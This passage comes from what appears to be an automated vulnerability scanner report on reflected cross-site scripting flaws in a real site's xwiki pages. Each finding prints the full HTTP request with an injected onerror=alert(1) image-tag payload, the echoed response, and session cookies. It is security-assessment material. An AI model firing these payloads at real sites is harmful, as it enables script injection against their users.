Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:14:18 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12908
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main/WebRss89aa6%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E625cf66d6b7?format=xar&amp;name=Main.WebRss89aa6"><img src=a onerror=alert(1)>625cf66d6b7&amp;pages=Main.WebRss89aa6">
...[SNIP]...

1.124. http://www.nuxeo.org/xwiki/bin/view/Main/WebSearch [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/WebSearch

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce21f"><img%20src%3da%20onerror%3dalert(1)>527223fb6d6 was submitted in the REST URL parameter 4. This input was echoed as ce21f"><img src=a onerror=alert(1)>527223fb6d6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Maince21f"><img%20src%3da%20onerror%3dalert(1)>527223fb6d6/WebSearch HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:16:08 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12963
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Maince21f%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E527223fb6d6/WebSearch?format=xar&amp;name=Maince21f"><img src=a onerror=alert(1)>527223fb6d6.WebSearch&amp;pages=Maince21f">
...[SNIP]...

1.125. http://www.nuxeo.org/xwiki/bin/view/Main/WebSearch [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/WebSearch

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5df85<img%20src%3da%20onerror%3dalert(1)>8a2f5dddb89 was submitted in the REST URL parameter 4. This input was echoed as 5df85<img src=a onerror=alert(1)>8a2f5dddb89 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main5df85<img%20src%3da%20onerror%3dalert(1)>8a2f5dddb89/WebSearch HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:17:04 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12897
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/Main5df85%3Cimg+src%3Da+onerror%3Dalert%281%29%3E8a2f5dddb89/">Main5df85<img src=a onerror=alert(1)>8a2f5dddb89</a>
...[SNIP]...

1.126. http://www.nuxeo.org/xwiki/bin/view/Main/WebSearch [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/WebSearch

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 5f4e0<img%20src%3da%20onerror%3dalert(1)>60a04462bbb was submitted in the REST URL parameter 5. This input was echoed as 5f4e0<img src=a onerror=alert(1)>60a04462bbb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/WebSearch5f4e0<img%20src%3da%20onerror%3dalert(1)>60a04462bbb HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:18:41 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12885
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/Main/WebSearch5f4e0%3Cimg+src%3Da+onerror%3Dalert%281%29%3E60a04462bbb'>WebSearch5f4e0<img src=a onerror=alert(1)>60a04462bbb</a>
...[SNIP]...

1.127. http://www.nuxeo.org/xwiki/bin/view/Main/WebSearch [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/WebSearch

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9111c"><img%20src%3da%20onerror%3dalert(1)>864bc9e0d28 was submitted in the REST URL parameter 5. This input was echoed as 9111c"><img src=a onerror=alert(1)>864bc9e0d28 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/WebSearch9111c"><img%20src%3da%20onerror%3dalert(1)>864bc9e0d28 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:17:47 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12947
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main/WebSearch9111c%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E864bc9e0d28?format=xar&amp;name=Main.WebSearch9111c"><img src=a onerror=alert(1)>864bc9e0d28&amp;pages=Main.WebSearch9111c">
...[SNIP]...

1.128. http://www.nuxeo.org/xwiki/bin/view/Main/WindowsService [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/WindowsService

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f6e09<img%20src%3da%20onerror%3dalert(1)>c2ab2f9a43c was submitted in the REST URL parameter 4. This input was echoed as f6e09<img src=a onerror=alert(1)>c2ab2f9a43c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Mainf6e09<img%20src%3da%20onerror%3dalert(1)>c2ab2f9a43c/WindowsService HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:14:33 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12962
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/Mainf6e09%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ec2ab2f9a43c/">Mainf6e09<img src=a onerror=alert(1)>c2ab2f9a43c</a>
...[SNIP]...

1.129. http://www.nuxeo.org/xwiki/bin/view/Main/WindowsService [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/WindowsService

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 924d9"><img%20src%3da%20onerror%3dalert(1)>50183281015 was submitted in the REST URL parameter 4. This input was echoed as 924d9"><img src=a onerror=alert(1)>50183281015 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main924d9"><img%20src%3da%20onerror%3dalert(1)>50183281015/WindowsService HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:13:58 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13028
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main924d9%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E50183281015/WindowsService?format=xar&amp;name=Main924d9"><img src=a onerror=alert(1)>50183281015.WindowsService&amp;pages=Main924d9">
...[SNIP]...

1.130. http://www.nuxeo.org/xwiki/bin/view/Main/WindowsService [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/WindowsService

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 789b1"><img%20src%3da%20onerror%3dalert(1)>6568bdce5f7 was submitted in the REST URL parameter 5. This input was echoed as 789b1"><img src=a onerror=alert(1)>6568bdce5f7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/WindowsService789b1"><img%20src%3da%20onerror%3dalert(1)>6568bdce5f7 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:15:01 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13012
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main/WindowsService789b1%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E6568bdce5f7?format=xar&amp;name=Main.WindowsService789b1"><img src=a onerror=alert(1)>6568bdce5f7&amp;pages=Main.WindowsService789b1">
...[SNIP]...

1.131. http://www.nuxeo.org/xwiki/bin/view/Main/WindowsService [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/WindowsService

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 673bb<img%20src%3da%20onerror%3dalert(1)>0945b5817dd was submitted in the REST URL parameter 5. This input was echoed as 673bb<img src=a onerror=alert(1)>0945b5817dd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/WindowsService673bb<img%20src%3da%20onerror%3dalert(1)>0945b5817dd HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:15:52 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12950
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/Main/WindowsService673bb%3Cimg+src%3Da+onerror%3Dalert%281%29%3E0945b5817dd'>WindowsService673bb<img src=a onerror=alert(1)>0945b5817dd</a>
...[SNIP]...

1.132. http://www.nuxeo.org/xwiki/bin/view/XWiki/Admin [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/XWiki/Admin

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 126ea"><img%20src%3da%20onerror%3dalert(1)>218d536e8de was submitted in the REST URL parameter 4. This input was echoed as 126ea"><img src=a onerror=alert(1)>218d536e8de in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/XWiki126ea"><img%20src%3da%20onerror%3dalert(1)>218d536e8de/Admin HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:16:42 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12924
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/XWiki126ea%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E218d536e8de/Admin?format=xar&amp;name=XWiki126ea"><img src=a onerror=alert(1)>218d536e8de.Admin&amp;pages=XWiki126ea">
...[SNIP]...

1.133. http://www.nuxeo.org/xwiki/bin/view/XWiki/Admin [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/XWiki/Admin

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1323f<img%20src%3da%20onerror%3dalert(1)>ed793d6b7ca was submitted in the REST URL parameter 4. This input was echoed as 1323f<img src=a onerror=alert(1)>ed793d6b7ca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/XWiki1323f<img%20src%3da%20onerror%3dalert(1)>ed793d6b7ca/Admin HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:17:21 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12858
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/XWiki1323f%3Cimg+src%3Da+onerror%3Dalert%281%29%3Eed793d6b7ca/">XWiki1323f<img src=a onerror=alert(1)>ed793d6b7ca</a>
...[SNIP]...

1.134. http://www.nuxeo.org/xwiki/bin/view/XWiki/Admin [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/XWiki/Admin

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 849fa<img%20src%3da%20onerror%3dalert(1)>8082881189 was submitted in the REST URL parameter 5. This input was echoed as 849fa<img src=a onerror=alert(1)>8082881189 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/XWiki/Admin849fa<img%20src%3da%20onerror%3dalert(1)>8082881189 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:18:41 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12833
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/XWiki/Admin849fa%3Cimg+src%3Da+onerror%3Dalert%281%29%3E8082881189'>Admin849fa<img src=a onerror=alert(1)>8082881189</a>
...[SNIP]...

1.135. http://www.nuxeo.org/xwiki/bin/view/XWiki/Admin [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/XWiki/Admin

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a623"><img%20src%3da%20onerror%3dalert(1)>31c99b72496 was submitted in the REST URL parameter 5. This input was echoed as 1a623"><img src=a onerror=alert(1)>31c99b72496 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/XWiki/Admin1a623"><img%20src%3da%20onerror%3dalert(1)>31c99b72496 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:17:54 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12908
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/XWiki/Admin1a623%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E31c99b72496?format=xar&amp;name=XWiki.Admin1a623"><img src=a onerror=alert(1)>31c99b72496&amp;pages=XWiki.Admin1a623">
...[SNIP]...

1.136. http://www.nuxeo.org/xwiki/bin/view/XWiki/JaneZupan [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/XWiki/JaneZupan

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 90042<img%20src%3da%20onerror%3dalert(1)>f4f08861abe was submitted in the REST URL parameter 4. This input was echoed as 90042<img src=a onerror=alert(1)>f4f08861abe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

